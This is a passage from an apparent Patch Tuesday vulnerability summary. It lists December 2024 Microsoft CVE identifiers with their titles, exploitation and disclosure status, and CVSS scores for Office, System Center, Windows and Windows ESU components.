CVE-2024-49063 Microsoft/Muzic Remote Code Execution Vulnerability No No 8.4

Microsoft Office vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-49068 Microsoft SharePoint Elevation of Privilege Vulnerability No No 8.2
CVE-2024-43600 Microsoft Office Elevation of Privilege Vulnerability No No 7.8
CVE-2024-49069 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2024-49142 Microsoft Access Remote Code Execution Vulnerability No No 7.8
CVE-2024-49070 Microsoft SharePoint Remote Code Execution Vulnerability No No 7.4
CVE-2024-49059 Microsoft Office Elevation of Privilege Vulnerability No No 7
CVE-2024-49064 Microsoft SharePoint Information Disclosure Vulnerability No No 6.5
CVE-2024-49062 Microsoft SharePoint Information Disclosure Vulnerability No No 6.5
CVE-2024-49065 Microsoft Office Remote Code Execution Vulnerability No No 5.5

System Center vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-49057 Microsoft Defender for Endpoint on Android Spoofing Vulnerability No No 8.1
CVE-2024-43594 System Center Operations Manager Elevation of Privilege Vulnerability No No 7.3

Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-49093 Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability No No 8.8
CVE-2024-49117 Windows Hyper-V Remote Code Execution Vulnerability No No 8.8
CVE-2024-49106 Windows Remote Desktop Services Remote Code Execution Vulnerability No No 8.1
CVE-2024-49108 Windows Remote Desktop Services Remote Code Execution Vulnerability No No 8.1
CVE-2024-49115 Windows Remote Desktop Services Remote Code Execution Vulnerability No No 8.1
CVE-2024-49119 Windows Remote Desktop Services Remote Code Execution Vulnerability No No 8.1
CVE-2024-49123 Windows Remote Desktop Services Remote Code Execution Vulnerability No No 8.1
CVE-2024-49132 Windows Remote Desktop Services Remote Code Execution Vulnerability No No 8.1
CVE-2024-49116 Windows Remote Desktop Services Remote Code Execution Vulnerability No No 8.1
CVE-2024-49076 Windows Virtualization-Based Security (VBS) Enclave Elevation of Privilege Vulnerability No No 7.8
CVE-2024-49074 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-49114 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-49075 Windows Remote Desktop Services Denial of Service Vulnerability No No 7.5
CVE-2024-49107 WmsRepair Service Elevation of Privilege Vulnerability No No 7.3
CVE-2024-49097 Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability No No 7
CVE-2024-49095 Windows PrintWorkflowUserSvc Elevation of Privilege Vulnerability No No 7
CVE-2024-49073 Windows Mobile Broadband Driver Elevation of Privilege Vulnerability No No 6.8
CVE-2024-49092 Windows Mobile Broadband Driver Elevation of Privilege Vulnerability No No 6.8
CVE-2024-49077 Windows Mobile Broadband Driver Elevation of Privilege Vulnerability No No 6.8
CVE-2024-49078 Windows Mobile Broadband Driver Elevation of Privilege Vulnerability No No 6.8
CVE-2024-49083 Windows Mobile Broadband Driver Elevation of Privilege Vulnerability No No 6.8
CVE-2024-49110 Windows Mobile Broadband Driver Elevation of Privilege Vulnerability No No 6.8
CVE-2024-49094 Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability No No 6.6
CVE-2024-49101 Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability No No 6.6
CVE-2024-49111 Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability No No 6.6
CVE-2024-49081 Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability No No 6.6
CVE-2024-49109 Wireless Wide Area Network Service (WwanSvc) Elevation of Privilege Vulnerability No No 6.6
CVE-2024-49087 Windows Mobile Broadband Driver Information Disclosure Vulnerability No No 4.6
CVE-2024-49098 Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability No No 4.3
CVE-2024-49099 Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability No No 4.3
CVE-2024-49103 Windows Wireless Wide Area Network Service (WwanSvc) Information Disclosure Vulnerability No No 4.3

Windows ESU vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2024-49112 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability No No 9.8
CVE-2024-49085 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 8.8
CVE-2024-49086 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 8.8
CVE-2024-49102 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 8.8
CVE-2024-49104 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 8.8
CVE-2024-49125 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 8.8
CVE-2024-49080 Windows IP Routing Management Snapin Remote Code Execution Vulnerability No No 8.8
CVE-2024-49120 Windows Remote Desktop Services Remote Code Execution Vulnerability No No 8.1
CVE-2024-49128 Windows Remote Desktop Services Remote Code Execution Vulnerability No No 8.1
CVE-2024-49126 Windows Local Security Authority Subsystem Service (LSASS) Remote Code Execution Vulnerability No No 8.1
CVE-2024-49127 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability No No 8.1
CVE-2024-49122 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability No No 8.1
CVE-2024-49118 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability No No 8.1
CVE-2024-49124 Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability No No 8.1
CVE-2024-49072 Windows Task Scheduler Elevation of Privilege Vulnerability No No 7.8
CVE-2024-49138 Windows Common Log File System Driver Elevation of Privilege Vulnerability Yes Yes 7.8
CVE-2024-49088 Windows Common Log File System Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-49090 Windows Common Log File System Driver Elevation of Privilege Vulnerability No No 7.8
CVE-2024-49079 Input Method Editor (IME) Remote Code Execution Vulnerability No No 7.8
CVE-2024-49129 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability No No 7.5
CVE-2024-49121 Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability No No 7.5
CVE-2024-49113 Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability No No 7.5
CVE-2024-49096 Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability No No 7.5
CVE-2024-49089 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability No No 7.2
CVE-2024-49091 Windows Domain Name Service Remote Code Execution Vulnerability No No 7.2
CVE-2024-49084 Windows Kernel Elevation of Privilege Vulnerability No No 7
CVE-2024-49082 Windows File Explorer Information Disclosure Vulnerability No No 6.8